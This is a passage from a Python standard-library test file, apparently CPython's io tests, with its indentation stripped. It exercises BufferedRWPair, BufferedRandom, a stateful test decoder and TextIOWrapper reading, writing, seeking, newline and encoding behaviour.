self.assertRaises(OSError, self.tp, self.MockRawIO(), NotWriteable())
def test_read(self):
pair = self.tp(self.BytesIO(b"abcdef"), self.MockRawIO())
self.assertEqual(pair.read(3), b"abc")
self.assertEqual(pair.read(1), b"d")
self.assertEqual(pair.read(), b"ef")
pair = self.tp(self.BytesIO(b"abc"), self.MockRawIO())
self.assertEqual(pair.read(None), b"abc")
def test_readlines(self):
pair = lambda: self.tp(self.BytesIO(b"abc\ndef\nh"), self.MockRawIO())
self.assertEqual(pair().readlines(), [b"abc\n", b"def\n", b"h"])
self.assertEqual(pair().readlines(), [b"abc\n", b"def\n", b"h"])
self.assertEqual(pair().readlines(5), [b"abc\n", b"def\n"])
def test_read1(self):
# .read1() is delegated to the underlying reader object, so this test
# can be shallow.
pair = self.tp(self.BytesIO(b"abcdef"), self.MockRawIO())
self.assertEqual(pair.read1(3), b"abc")
def test_readinto(self):
pair = self.tp(self.BytesIO(b"abcdef"), self.MockRawIO())
data = bytearray(5)
self.assertEqual(pair.readinto(data), 5)
self.assertEqual(data, b"abcde")
def test_write(self):
w = self.MockRawIO()
pair = self.tp(self.MockRawIO(), w)
pair.write(b"abc")
pair.flush()
pair.write(b"def")
pair.flush()
self.assertEqual(w._write_stack, [b"abc", b"def"])
def test_peek(self):
pair = self.tp(self.BytesIO(b"abcdef"), self.MockRawIO())
self.assertTrue(pair.peek(3).startswith(b"abc"))
self.assertEqual(pair.read(3), b"abc")
def test_readable(self):
pair = self.tp(self.MockRawIO(), self.MockRawIO())
self.assertTrue(pair.readable())
def test_writeable(self):
pair = self.tp(self.MockRawIO(), self.MockRawIO())
self.assertTrue(pair.writable())
def test_seekable(self):
# BufferedRWPairs are never seekable, even if their readers and writers
# are.
pair = self.tp(self.MockRawIO(), self.MockRawIO())
self.assertFalse(pair.seekable())
# .flush() is delegated to the underlying writer object and has been
# tested in the test_write method.
def test_close_and_closed(self):
pair = self.tp(self.MockRawIO(), self.MockRawIO())
self.assertFalse(pair.closed)
pair.close()
self.assertTrue(pair.closed)
def test_reader_close_error_on_close(self):
def reader_close():
reader_non_existing
reader = self.MockRawIO()
reader.close = reader_close
writer = self.MockRawIO()
pair = self.tp(reader, writer)
with self.assertRaises(NameError) as err:
pair.close()
self.assertIn('reader_non_existing', str(err.exception))
self.assertTrue(pair.closed)
self.assertFalse(reader.closed)
self.assertTrue(writer.closed)
def test_writer_close_error_on_close(self):
def writer_close():
writer_non_existing
reader = self.MockRawIO()
writer = self.MockRawIO()
writer.close = writer_close
pair = self.tp(reader, writer)
with self.assertRaises(NameError) as err:
pair.close()
self.assertIn('writer_non_existing', str(err.exception))
self.assertFalse(pair.closed)
self.assertTrue(reader.closed)
self.assertFalse(writer.closed)
def test_reader_writer_close_error_on_close(self):
def reader_close():
reader_non_existing
def writer_close():
writer_non_existing
reader = self.MockRawIO()
reader.close = reader_close
writer = self.MockRawIO()
writer.close = writer_close
pair = self.tp(reader, writer)
with self.assertRaises(NameError) as err:
pair.close()
self.assertIn('reader_non_existing', str(err.exception))
self.assertIsInstance(err.exception.__context__, NameError)
self.assertIn('writer_non_existing', str(err.exception.__context__))
self.assertFalse(pair.closed)
self.assertFalse(reader.closed)
self.assertFalse(writer.closed)
def test_isatty(self):
class SelectableIsAtty(MockRawIO):
def __init__(self, isatty):
MockRawIO.__init__(self)
self._isatty = isatty
def isatty(self):
return self._isatty
pair = self.tp(SelectableIsAtty(False), SelectableIsAtty(False))
self.assertFalse(pair.isatty())
pair = self.tp(SelectableIsAtty(True), SelectableIsAtty(False))
self.assertTrue(pair.isatty())
pair = self.tp(SelectableIsAtty(False), SelectableIsAtty(True))
self.assertTrue(pair.isatty())
pair = self.tp(SelectableIsAtty(True), SelectableIsAtty(True))
self.assertTrue(pair.isatty())
def test_weakref_clearing(self):
brw = self.tp(self.MockRawIO(), self.MockRawIO())
ref = weakref.ref(brw)
brw = None
ref = None # Shouldn't segfault.
class CBufferedRWPairTest(BufferedRWPairTest):
tp = io.BufferedRWPair
class PyBufferedRWPairTest(BufferedRWPairTest):
tp = pyio.BufferedRWPair
class BufferedRandomTest(BufferedReaderTest, BufferedWriterTest):
read_mode = "rb+"
write_mode = "wb+"
def test_constructor(self):
BufferedReaderTest.test_constructor(self)
BufferedWriterTest.test_constructor(self)
def test_uninitialized(self):
BufferedReaderTest.test_uninitialized(self)
BufferedWriterTest.test_uninitialized(self)
def test_read_and_write(self):
raw = self.MockRawIO((b"asdf", b"ghjk"))
rw = self.tp(raw, 8)
self.assertEqual(b"as", rw.read(2))
rw.write(b"ddd")
rw.write(b"eee")
self.assertFalse(raw._write_stack) # Buffer writes
self.assertEqual(b"ghjk", rw.read())
self.assertEqual(b"dddeee", raw._write_stack[0])
def test_seek_and_tell(self):
raw = self.BytesIO(b"asdfghjkl")
rw = self.tp(raw)
self.assertEqual(b"as", rw.read(2))
self.assertEqual(2, rw.tell())
rw.seek(0, 0)
self.assertEqual(b"asdf", rw.read(4))
rw.write(b"123f")
rw.seek(0, 0)
self.assertEqual(b"asdf123fl", rw.read())
self.assertEqual(9, rw.tell())
rw.seek(-4, 2)
self.assertEqual(5, rw.tell())
rw.seek(2, 1)
self.assertEqual(7, rw.tell())
self.assertEqual(b"fl", rw.read(11))
rw.flush()
self.assertEqual(b"asdf123fl", raw.getvalue())
self.assertRaises(TypeError, rw.seek, 0.0)
def check_flush_and_read(self, read_func):
raw = self.BytesIO(b"abcdefghi")
bufio = self.tp(raw)
self.assertEqual(b"ab", read_func(bufio, 2))
bufio.write(b"12")
self.assertEqual(b"ef", read_func(bufio, 2))
self.assertEqual(6, bufio.tell())
bufio.flush()
self.assertEqual(6, bufio.tell())
self.assertEqual(b"ghi", read_func(bufio))
raw.seek(0, 0)
raw.write(b"XYZ")
# flush() resets the read buffer
bufio.flush()
bufio.seek(0, 0)
self.assertEqual(b"XYZ", read_func(bufio, 3))
def test_flush_and_read(self):
self.check_flush_and_read(lambda bufio, *args: bufio.read(*args))
def test_flush_and_readinto(self):
def _readinto(bufio, n=-1):
b = bytearray(n if n >= 0 else 9999)
n = bufio.readinto(b)
return bytes(b[:n])
self.check_flush_and_read(_readinto)
def test_flush_and_peek(self):
def _peek(bufio, n=-1):
# This relies on the fact that the buffer can contain the whole
# raw stream, otherwise peek() can return less.
b = bufio.peek(n)
if n != -1:
b = b[:n]
bufio.seek(len(b), 1)
return b
self.check_flush_and_read(_peek)
def test_flush_and_write(self):
raw = self.BytesIO(b"abcdefghi")
bufio = self.tp(raw)
bufio.write(b"123")
bufio.flush()
bufio.write(b"45")
bufio.flush()
bufio.seek(0, 0)
self.assertEqual(b"12345fghi", raw.getvalue())
self.assertEqual(b"12345fghi", bufio.read())
def test_threads(self):
BufferedReaderTest.test_threads(self)
BufferedWriterTest.test_threads(self)
def test_writes_and_peek(self):
def _peek(bufio):
bufio.peek(1)
self.check_writes(_peek)
def _peek(bufio):
pos = bufio.tell()
bufio.seek(-1, 1)
bufio.peek(1)
bufio.seek(pos, 0)
self.check_writes(_peek)
def test_writes_and_reads(self):
def _read(bufio):
bufio.seek(-1, 1)
bufio.read(1)
self.check_writes(_read)
def test_writes_and_read1s(self):
def _read1(bufio):
bufio.seek(-1, 1)
bufio.read1(1)
self.check_writes(_read1)
def test_writes_and_readintos(self):
def _read(bufio):
bufio.seek(-1, 1)
bufio.readinto(bytearray(1))
self.check_writes(_read)
def test_write_after_readahead(self):
# Issue #6629: writing after the buffer was filled by readahead should
# first rewind the raw stream.
for overwrite_size in [1, 5]:
raw = self.BytesIO(b"A" * 10)
bufio = self.tp(raw, 4)
# Trigger readahead
self.assertEqual(bufio.read(1), b"A")
self.assertEqual(bufio.tell(), 1)
# Overwriting should rewind the raw stream if it needs so
bufio.write(b"B" * overwrite_size)
self.assertEqual(bufio.tell(), overwrite_size + 1)
# If the write size was smaller than the buffer size, flush() and
# check that rewind happens.
bufio.flush()
self.assertEqual(bufio.tell(), overwrite_size + 1)
s = raw.getvalue()
self.assertEqual(s,
b"A" + b"B" * overwrite_size + b"A" * (9 - overwrite_size))
def test_write_rewind_write(self):
# Various combinations of reading / writing / seeking backwards / writing again
def mutate(bufio, pos1, pos2):
assert pos2 >= pos1
# Fill the buffer
bufio.seek(pos1)
bufio.read(pos2 - pos1)
bufio.write(b'\x02')
# This writes earlier than the previous write, but still inside
# the buffer.
bufio.seek(pos1)
bufio.write(b'\x01')
b = b"\x80\x81\x82\x83\x84"
for i in range(0, len(b)):
for j in range(i, len(b)):
raw = self.BytesIO(b)
bufio = self.tp(raw, 100)
mutate(bufio, i, j)
bufio.flush()
expected = bytearray(b)
expected[j] = 2
expected[i] = 1
self.assertEqual(raw.getvalue(), expected,
"failed result for i=%d, j=%d" % (i, j))
def test_truncate_after_read_or_write(self):
raw = self.BytesIO(b"A" * 10)
bufio = self.tp(raw, 100)
self.assertEqual(bufio.read(2), b"AA") # the read buffer gets filled
self.assertEqual(bufio.truncate(), 2)
self.assertEqual(bufio.write(b"BB"), 2) # the write buffer increases
self.assertEqual(bufio.truncate(), 4)
def test_misbehaved_io(self):
BufferedReaderTest.test_misbehaved_io(self)
BufferedWriterTest.test_misbehaved_io(self)
def test_interleaved_read_write(self):
# Test for issue #12213
with self.BytesIO(b'abcdefgh') as raw:
with self.tp(raw, 100) as f:
f.write(b"1")
self.assertEqual(f.read(1), b'b')
f.write(b'2')
self.assertEqual(f.read1(1), b'd')
f.write(b'3')
buf = bytearray(1)
f.readinto(buf)
self.assertEqual(buf, b'f')
f.write(b'4')
self.assertEqual(f.peek(1), b'h')
f.flush()
self.assertEqual(raw.getvalue(), b'1b2d3f4h')
with self.BytesIO(b'abc') as raw:
with self.tp(raw, 100) as f:
self.assertEqual(f.read(1), b'a')
f.write(b"2")
self.assertEqual(f.read(1), b'c')
f.flush()
self.assertEqual(raw.getvalue(), b'a2c')
def test_interleaved_readline_write(self):
with self.BytesIO(b'ab\ncdef\ng\n') as raw:
with self.tp(raw) as f:
f.write(b'1')
self.assertEqual(f.readline(), b'b\n')
f.write(b'2')
self.assertEqual(f.readline(), b'def\n')
f.write(b'3')
self.assertEqual(f.readline(), b'\n')
f.flush()
self.assertEqual(raw.getvalue(), b'1b\n2def\n3\n')
# You can't construct a BufferedRandom over a non-seekable stream.
test_unseekable = None
class CBufferedRandomTest(BufferedRandomTest, SizeofTest):
tp = io.BufferedRandom
def test_constructor(self):
BufferedRandomTest.test_constructor(self)
# The allocation can succeed on 32-bit builds, e.g. with more
# than 2GB RAM and a 64-bit kernel.
if sys.maxsize > 0x7FFFFFFF:
rawio = self.MockRawIO()
bufio = self.tp(rawio)
self.assertRaises((OverflowError, MemoryError, ValueError),
bufio.__init__, rawio, sys.maxsize)
def test_garbage_collection(self):
CBufferedReaderTest.test_garbage_collection(self)
CBufferedWriterTest.test_garbage_collection(self)
def test_args_error(self):
# Issue #17275
with self.assertRaisesRegex(TypeError, "BufferedRandom"):
self.tp(io.BytesIO(), 1024, 1024, 1024)
class PyBufferedRandomTest(BufferedRandomTest):
tp = pyio.BufferedRandom
# To fully exercise seek/tell, the StatefulIncrementalDecoder has these
# properties:
# - A single output character can correspond to many bytes of input.
# - The number of input bytes to complete the character can be
# undetermined until the last input byte is received.
# - The number of input bytes can vary depending on previous input.
# - A single input byte can correspond to many characters of output.
# - The number of output characters can be undetermined until the
# last input byte is received.
# - The number of output characters can vary depending on previous input.
class StatefulIncrementalDecoder(codecs.IncrementalDecoder):
"""
For testing seek/tell behavior with a stateful, buffering decoder.
Input is a sequence of words. Words may be fixed-length (length set
by input) or variable-length (period-terminated). In variable-length
mode, extra periods are ignored. Possible words are:
- 'i' followed by a number sets the input length, I (maximum 99).
When I is set to 0, words are space-terminated.
- 'o' followed by a number sets the output length, O (maximum 99).
- Any other word is converted into a word followed by a period on
the output. The output word consists of the input word truncated
or padded out with hyphens to make its length equal to O. If O
is 0, the word is output verbatim without truncating or padding.
I and O are initially set to 1. When I changes, any buffered input is
re-scanned according to the new I. EOF also terminates the last word.
"""
def __init__(self, errors='strict'):
codecs.IncrementalDecoder.__init__(self, errors)
self.reset()
def __repr__(self):
return '<SID %x>' % id(self)
def reset(self):
self.i = 1
self.o = 1
self.buffer = bytearray()
def getstate(self):
i, o = self.i ^ 1, self.o ^ 1 # so that flags = 0 after reset()
return bytes(self.buffer), i*100 + o
def setstate(self, state):
buffer, io = state
self.buffer = bytearray(buffer)
i, o = divmod(io, 100)
self.i, self.o = i ^ 1, o ^ 1
def decode(self, input, final=False):
output = ''
for b in input:
if self.i == 0: # variable-length, terminated with period
if b == ord('.'):
if self.buffer:
output += self.process_word()
else:
self.buffer.append(b)
else: # fixed-length, terminate after self.i bytes
self.buffer.append(b)
if len(self.buffer) == self.i:
output += self.process_word()
if final and self.buffer: # EOF terminates the last word
output += self.process_word()
return output
def process_word(self):
output = ''
if self.buffer[0] == ord('i'):
self.i = min(99, int(self.buffer[1:] or 0)) # set input length
elif self.buffer[0] == ord('o'):
self.o = min(99, int(self.buffer[1:] or 0)) # set output length
else:
output = self.buffer.decode('ascii')
if len(output) < self.o:
output += '-'*self.o # pad out with hyphens
if self.o:
output = output[:self.o] # truncate to output length
output += '.'
self.buffer = bytearray()
return output
codecEnabled = False
@classmethod
def lookupTestDecoder(cls, name):
if cls.codecEnabled and name == 'test_decoder':
latin1 = codecs.lookup('latin-1')
return codecs.CodecInfo(
name='test_decoder', encode=latin1.encode, decode=None,
incrementalencoder=None,
streamreader=None, streamwriter=None,
incrementaldecoder=cls)
# Register the previous decoder for testing.
# Disabled by default, tests will enable it.
codecs.register(StatefulIncrementalDecoder.lookupTestDecoder)
class StatefulIncrementalDecoderTest(unittest.TestCase):
"""
Make sure the StatefulIncrementalDecoder actually works.
"""
test_cases = [
# I=1, O=1 (fixed-length input == fixed-length output)
(b'abcd', False, 'a.b.c.d.'),
# I=0, O=0 (variable-length input, variable-length output)
(b'oiabcd', True, 'abcd.'),
# I=0, O=0 (should ignore extra periods)
(b'oi...abcd...', True, 'abcd.'),
# I=0, O=6 (variable-length input, fixed-length output)
(b'i.o6.x.xyz.toolongtofit.', False, 'x-----.xyz---.toolon.'),
# I=2, O=6 (fixed-length input < fixed-length output)
(b'i.i2.o6xyz', True, 'xy----.z-----.'),
# I=6, O=3 (fixed-length input > fixed-length output)
(b'i.o3.i6.abcdefghijklmnop', True, 'abc.ghi.mno.'),
# I=0, then 3; O=29, then 15 (with longer output)
(b'i.o29.a.b.cde.o15.abcdefghijabcdefghij.i3.a.b.c.d.ei00k.l.m', True,
'a----------------------------.' +
'b----------------------------.' +
'cde--------------------------.' +
'abcdefghijabcde.' +
'a.b------------.' +
'.c.------------.' +
'd.e------------.' +
'k--------------.' +
'l--------------.' +
'm--------------.')
]
def test_decoder(self):
# Try a few one-shot test cases.
for input, eof, output in self.test_cases:
d = StatefulIncrementalDecoder()
self.assertEqual(d.decode(input, eof), output)
# Also test an unfinished decode, followed by forcing EOF.
d = StatefulIncrementalDecoder()
self.assertEqual(d.decode(b'oiabcd'), '')
self.assertEqual(d.decode(b'', 1), 'abcd.')
class TextIOWrapperTest(unittest.TestCase):
def setUp(self):
self.testdata = b"AAA\r\nBBB\rCCC\r\nDDD\nEEE\r\n"
self.normalized = b"AAA\nBBB\nCCC\nDDD\nEEE\n".decode("ascii")
support.unlink(support.TESTFN)
def tearDown(self):
support.unlink(support.TESTFN)
def test_constructor(self):
r = self.BytesIO(b"\xc3\xa9\n\n")
b = self.BufferedReader(r, 1000)
t = self.TextIOWrapper(b)
t.__init__(b, encoding="latin-1", newline="\r\n")
self.assertEqual(t.encoding, "latin-1")
self.assertEqual(t.line_buffering, False)
t.__init__(b, encoding="utf-8", line_buffering=True)
self.assertEqual(t.encoding, "utf-8")
self.assertEqual(t.line_buffering, True)
self.assertEqual("\xe9\n", t.readline())
self.assertRaises(TypeError, t.__init__, b, newline=42)
self.assertRaises(ValueError, t.__init__, b, newline='xyzzy')
def test_uninitialized(self):
t = self.TextIOWrapper.__new__(self.TextIOWrapper)
del t
t = self.TextIOWrapper.__new__(self.TextIOWrapper)
self.assertRaises(Exception, repr, t)
self.assertRaisesRegex((ValueError, AttributeError),
'uninitialized|has no attribute',
t.read, 0)
t.__init__(self.MockRawIO())
self.assertEqual(t.read(0), '')
def test_non_text_encoding_codecs_are_rejected(self):
# Ensure the constructor complains if passed a codec that isn't
# marked as a text encoding
# http://bugs.python.org/issue20404
r = self.BytesIO()
b = self.BufferedWriter(r)
with self.assertRaisesRegex(LookupError, "is not a text encoding"):
self.TextIOWrapper(b, encoding="hex")
def test_detach(self):
r = self.BytesIO()
b = self.BufferedWriter(r)
t = self.TextIOWrapper(b)
self.assertIs(t.detach(), b)
t = self.TextIOWrapper(b, encoding="ascii")
t.write("howdy")
self.assertFalse(r.getvalue())
t.detach()
self.assertEqual(r.getvalue(), b"howdy")
self.assertRaises(ValueError, t.detach)
# Operations independent of the detached stream should still work
repr(t)
self.assertEqual(t.encoding, "ascii")
self.assertEqual(t.errors, "strict")
self.assertFalse(t.line_buffering)
def test_repr(self):
raw = self.BytesIO("hello".encode("utf-8"))
b = self.BufferedReader(raw)
t = self.TextIOWrapper(b, encoding="utf-8")
modname = self.TextIOWrapper.__module__
self.assertEqual(repr(t),
"<%s.TextIOWrapper encoding='utf-8'>" % modname)
raw.name = "dummy"
self.assertEqual(repr(t),
"<%s.TextIOWrapper name='dummy' encoding='utf-8'>" % modname)
t.mode = "r"
self.assertEqual(repr(t),
"<%s.TextIOWrapper name='dummy' mode='r' encoding='utf-8'>" % modname)
raw.name = b"dummy"
self.assertEqual(repr(t),
"<%s.TextIOWrapper name=b'dummy' mode='r' encoding='utf-8'>" % modname)
t.buffer.detach()
repr(t) # Should not raise an exception
def test_line_buffering(self):
r = self.BytesIO()
b = self.BufferedWriter(r, 1000)
t = self.TextIOWrapper(b, newline="\n", line_buffering=True)
t.write("X")
self.assertEqual(r.getvalue(), b"") # No flush happened
t.write("Y\nZ")
self.assertEqual(r.getvalue(), b"XY\nZ") # All got flushed
t.write("A\rB")
self.assertEqual(r.getvalue(), b"XY\nZA\rB")
def test_default_encoding(self):
old_environ = dict(os.environ)
try:
# try to get a user preferred encoding different than the current
# locale encoding to check that TextIOWrapper() uses the current
# locale encoding and not the user preferred encoding
for key in ('LC_ALL', 'LANG', 'LC_CTYPE'):
if key in os.environ:
del os.environ[key]
current_locale_encoding = locale.getpreferredencoding(False)
b = self.BytesIO()
t = self.TextIOWrapper(b)
self.assertEqual(t.encoding, current_locale_encoding)
finally:
os.environ.clear()
os.environ.update(old_environ)
@support.cpython_only
def test_device_encoding(self):
# Issue 15989
import _testcapi
b = self.BytesIO()
b.fileno = lambda: _testcapi.INT_MAX + 1
self.assertRaises(OverflowError, self.TextIOWrapper, b)
b.fileno = lambda: _testcapi.UINT_MAX + 1
self.assertRaises(OverflowError, self.TextIOWrapper, b)
def test_encoding(self):
# Check the encoding attribute is always set, and valid
b = self.BytesIO()
t = self.TextIOWrapper(b, encoding="utf-8")
self.assertEqual(t.encoding, "utf-8")
t = self.TextIOWrapper(b)
self.assertIsNotNone(t.encoding)
codecs.lookup(t.encoding)
def test_encoding_errors_reading(self):
# (1) default
b = self.BytesIO(b"abc\n\xff\n")
t = self.TextIOWrapper(b, encoding="ascii")
self.assertRaises(UnicodeError, t.read)
# (2) explicit strict
b = self.BytesIO(b"abc\n\xff\n")
t = self.TextIOWrapper(b, encoding="ascii", errors="strict")
self.assertRaises(UnicodeError, t.read)
# (3) ignore
b = self.BytesIO(b"abc\n\xff\n")
t = self.TextIOWrapper(b, encoding="ascii", errors="ignore")
self.assertEqual(t.read(), "abc\n\n")
# (4) replace
b = self.BytesIO(b"abc\n\xff\n")
t = self.TextIOWrapper(b, encoding="ascii", errors="replace")
self.assertEqual(t.read(), "abc\n\ufffd\n")
def test_encoding_errors_writing(self):
# (1) default
b = self.BytesIO()
t = self.TextIOWrapper(b, encoding="ascii")
self.assertRaises(UnicodeError, t.write, "\xff")
# (2) explicit strict
b = self.BytesIO()
t = self.TextIOWrapper(b, encoding="ascii", errors="strict")
self.assertRaises(UnicodeError, t.write, "\xff")
# (3) ignore
b = self.BytesIO()
t = self.TextIOWrapper(b, encoding="ascii", errors="ignore",
newline="\n")
t.write("abc\xffdef\n")
t.flush()
self.assertEqual(b.getvalue(), b"abcdef\n")
# (4) replace
b = self.BytesIO()
t = self.TextIOWrapper(b, encoding="ascii", errors="replace",
newline="\n")
t.write("abc\xffdef\n")
t.flush()
self.assertEqual(b.getvalue(), b"abc?def\n")
def test_newlines(self):
input_lines = [ "unix\n", "windows\r\n", "os9\r", "last\n", "nonl" ]
tests = [
[ None, [ 'unix\n', 'windows\n', 'os9\n', 'last\n', 'nonl' ] ],
[ '', input_lines ],
[ '\n', [ "unix\n", "windows\r\n", "os9\rlast\n", "nonl" ] ],
[ '\r\n', [ "unix\nwindows\r\n", "os9\rlast\nnonl" ] ],
[ '\r', [ "unix\nwindows\r", "\nos9\r", "last\nnonl" ] ],
]
encodings = (
'utf-8', 'latin-1',
'utf-16', 'utf-16-le', 'utf-16-be',
'utf-32', 'utf-32-le', 'utf-32-be',
)
# Try a range of buffer sizes to test the case where \r is the last
# character in TextIOWrapper._pending_line.
for encoding in encodings:
# XXX: str.encode() should return bytes
data = bytes(''.join(input_lines).encode(encoding))
for do_reads in (False, True):
for bufsize in range(1, 10):
for newline, exp_lines in tests:
bufio = self.BufferedReader(self.BytesIO(data), bufsize)
textio = self.TextIOWrapper(bufio, newline=newline,
encoding=encoding)
if do_reads:
got_lines = []
while True:
c2 = textio.read(2)
if c2 == '':
break
self.assertEqual(len(c2), 2)
got_lines.append(c2 + textio.readline())
else:
got_lines = list(textio)
for got_line, exp_line in zip(got_lines, exp_lines):
self.assertEqual(got_line, exp_line)
self.assertEqual(len(got_lines), len(exp_lines))
def test_newlines_input(self):
testdata = b"AAA\nBB\x00B\nCCC\rDDD\rEEE\r\nFFF\r\nGGG"
normalized = testdata.replace(b"\r\n", b"\n").replace(b"\r", b"\n")
for newline, expected in [
(None, normalized.decode("ascii").splitlines(keepends=True)),
("", testdata.decode("ascii").splitlines(keepends=True)),
("\n", ["AAA\n", "BB\x00B\n", "CCC\rDDD\rEEE\r\n", "FFF\r\n", "GGG"]),
("\r\n", ["AAA\nBB\x00B\nCCC\rDDD\rEEE\r\n", "FFF\r\n", "GGG"]),
("\r", ["AAA\nBB\x00B\nCCC\r", "DDD\r", "EEE\r", "\nFFF\r", "\nGGG"]),
]:
buf = self.BytesIO(testdata)
txt = self.TextIOWrapper(buf, encoding="ascii", newline=newline)
self.assertEqual(txt.readlines(), expected)
txt.seek(0)
self.assertEqual(txt.read(), "".join(expected))
def test_newlines_output(self):
testdict = {
"": b"AAA\nBBB\nCCC\nX\rY\r\nZ",
"\n": b"AAA\nBBB\nCCC\nX\rY\r\nZ",
"\r": b"AAA\rBBB\rCCC\rX\rY\r\rZ",
"\r\n": b"AAA\r\nBBB\r\nCCC\r\nX\rY\r\r\nZ",
}
tests = [(None, testdict[os.linesep])] + sorted(testdict.items())
for newline, expected in tests:
buf = self.BytesIO()
txt = self.TextIOWrapper(buf, encoding="ascii", newline=newline)
txt.write("AAA\nB")
txt.write("BB\nCCC\n")
txt.write("X\rY\r\nZ")
txt.flush()
self.assertEqual(buf.closed, False)
self.assertEqual(buf.getvalue(), expected)
def test_destructor(self):
l = []
base = self.BytesIO
class MyBytesIO(base):
def close(self):
l.append(self.getvalue())
base.close(self)
b = MyBytesIO()
t = self.TextIOWrapper(b, encoding="ascii")
t.write("abc")
del t
support.gc_collect()
self.assertEqual([b"abc"], l)
def test_override_destructor(self):
record = []
class MyTextIO(self.TextIOWrapper):
def __del__(self):
record.append(1)
try:
f = super().__del__
except AttributeError:
pass
else:
f()
def close(self):
record.append(2)
super().close()
def flush(self):
record.append(3)
super().flush()
b = self.BytesIO()
t = MyTextIO(b, encoding="ascii")
del t
support.gc_collect()
self.assertEqual(record, [1, 2, 3])
def test_error_through_destructor(self):
# Test that the exception state is not modified by a destructor,
# even if close() fails.
rawio = self.CloseFailureIO()
def f():
self.TextIOWrapper(rawio).xyzzy
with support.captured_output("stderr") as s:
self.assertRaises(AttributeError, f)
s = s.getvalue().strip()
if s:
# The destructor *may* have printed an unraisable error, check it
self.assertEqual(len(s.splitlines()), 1)
self.assertTrue(s.startswith("Exception OSError: "), s)
self.assertTrue(s.endswith(" ignored"), s)
# Systematic tests of the text I/O API
def test_basic_io(self):
for chunksize in (1, 2, 3, 4, 5, 15, 16, 17, 31, 32, 33, 63, 64, 65):
for enc in "ascii", "latin-1", "utf-8" :# , "utf-16-be", "utf-16-le":
f = self.open(support.TESTFN, "w+", encoding=enc)
f._CHUNK_SIZE = chunksize
self.assertEqual(f.write("abc"), 3)
f.close()
f = self.open(support.TESTFN, "r+", encoding=enc)
f._CHUNK_SIZE = chunksize
self.assertEqual(f.tell(), 0)
self.assertEqual(f.read(), "abc")
cookie = f.tell()
self.assertEqual(f.seek(0), 0)
self.assertEqual(f.read(None), "abc")
f.seek(0)
self.assertEqual(f.read(2), "ab")
self.assertEqual(f.read(1), "c")
self.assertEqual(f.read(1), "")
self.assertEqual(f.read(), "")
self.assertEqual(f.tell(), cookie)
self.assertEqual(f.seek(0), 0)
self.assertEqual(f.seek(0, 2), cookie)
self.assertEqual(f.write("def"), 3)
self.assertEqual(f.seek(cookie), cookie)
self.assertEqual(f.read(), "def")
if enc.startswith("utf"):
self.multi_line_test(f, enc)
f.close()
def multi_line_test(self, f, enc):
f.seek(0)
f.truncate()
sample = "s\xff\u0fff\uffff"
wlines = []
for size in (0, 1, 2, 3, 4, 5, 30, 31, 32, 33, 62, 63, 64, 65, 1000):
chars = []
for i in range(size):
chars.append(sample[i % len(sample)])
line = "".join(chars) + "\n"
wlines.append((f.tell(), line))
f.write(line)
f.seek(0)
rlines = []
while True:
pos = f.tell()
line = f.readline()
if not line:
break
rlines.append((pos, line))
self.assertEqual(rlines, wlines)
def test_telling(self):
f = self.open(support.TESTFN, "w+", encoding="utf-8")
p0 = f.tell()
f.write("\xff\n")
p1 = f.tell()
f.write("\xff\n")
p2 = f.tell()
f.seek(0)
self.assertEqual(f.tell(), p0)
self.assertEqual(f.readline(), "\xff\n")
self.assertEqual(f.tell(), p1)
self.assertEqual(f.readline(), "\xff\n")
self.assertEqual(f.tell(), p2)
f.seek(0)
for line in f:
self.assertEqual(line, "\xff\n")
self.assertRaises(OSError, f.tell)
self.assertEqual(f.tell(), p2)
f.close()
def test_seeking(self):
chunk_size = _default_chunk_size()
prefix_size = chunk_size - 2
u_prefix = "a" * prefix_size
prefix = bytes(u_prefix.encode("utf-8"))
self.assertEqual(len(u_prefix), len(prefix))
u_suffix = "\u8888\n"
suffix = bytes(u_suffix.encode("utf-8"))
line = prefix + suffix
with self.open(support.TESTFN, "wb") as f:
f.write(line*2)
with self.open(support.TESTFN, "r", encoding="utf-8") as f:
s = f.read(prefix_size)
self.assertEqual(s, str(prefix, "ascii"))
self.assertEqual(f.tell(), prefix_size)
self.assertEqual(f.readline(), u_suffix)
def test_seeking_too(self):
# Regression test for a specific bug
data = b'\xe0\xbf\xbf\n'
with self.open(support.TESTFN, "wb") as f:
f.write(data)
with self.open(support.TESTFN, "r", encoding="utf-8") as f:
f._CHUNK_SIZE # Just test that it exists
f._CHUNK_SIZE = 2
f.readline()
f.tell()
def test_seek_and_tell(self):
#Test seek/tell using the StatefulIncrementalDecoder.
# Make test faster by doing smaller seeks
CHUNK_SIZE = 128
def test_seek_and_tell_with_data(data, min_pos=0):
"""Tell/seek to various points within a data stream and ensure
that the decoded data returned by read() is consistent."""
f = self.open(support.TESTFN, 'wb')
f.write(data)
f.close()
f = self.open(support.TESTFN, encoding='test_decoder')
f._CHUNK_SIZE = CHUNK_SIZE
decoded = f.read()
f.close()
for i in range(min_pos, len(decoded) + 1): # seek positions
for j in [1, 5, len(decoded) - i]: # read lengths
f = self.open(support.TESTFN, encoding='test_decoder')
self.assertEqual(f.read(i), decoded[:i])
cookie = f.tell()
self.assertEqual(f.read(j), decoded[i:i + j])
f.seek(cookie)
self.assertEqual(f.read(), decoded[i:])
f.close()
# Enable the test decoder.
StatefulIncrementalDecoder.codecEnabled = 1
# Run the tests.
try:
# Try each test case.
for input, _, _ in StatefulIncrementalDecoderTest.test_cases:
test_seek_and_tell_with_data(input)
# Position each test case so that it crosses a chunk boundary.
for input, _, _ in StatefulIncrementalDecoderTest.test_cases:
offset = CHUNK_SIZE - len(input)//2
prefix = b'.'*offset
# Don't bother seeking into the prefix (takes too long).
min_pos = offset*2
test_seek_and_tell_with_data(prefix + input, min_pos)
# Ensure our test decoder won't interfere with subsequent tests.
finally:
StatefulIncrementalDecoder.codecEnabled = 0
def test_encoded_writes(self):
data = "1234567890"
tests = ("utf-16",
"utf-16-le",
"utf-16-be",
"utf-32",
"utf-32-le",
"utf-32-be")
for encoding in tests:
buf = self.BytesIO()
f = self.TextIOWrapper(buf, encoding=encoding)
# Check if the BOM is written only once (see issue1753).
f.write(data)
f.write(data)
f.seek(0)
self.assertEqual(f.read(), data * 2)
f.seek(0)
self.assertEqual(f.read(), data * 2)
self.assertEqual(buf.getvalue(), (data * 2).encode(encoding))
def test_unreadable(self):
class UnReadable(self.BytesIO):
def readable(self):
return False
txt = self.TextIOWrapper(UnReadable())
self.assertRaises(OSError, txt.read)
def test_read_one_by_one(self):
txt = self.TextIOWrapper(self.BytesIO(b"AA\r\nBB"))
reads = ""
while True:
c = txt.read(1)
if not c:
break
reads += c
self.assertEqual(reads, "AA\nBB")
def test_readlines(self):
txt = self.TextIOWrapper(self.BytesIO(b"AA\nBB\nCC"))
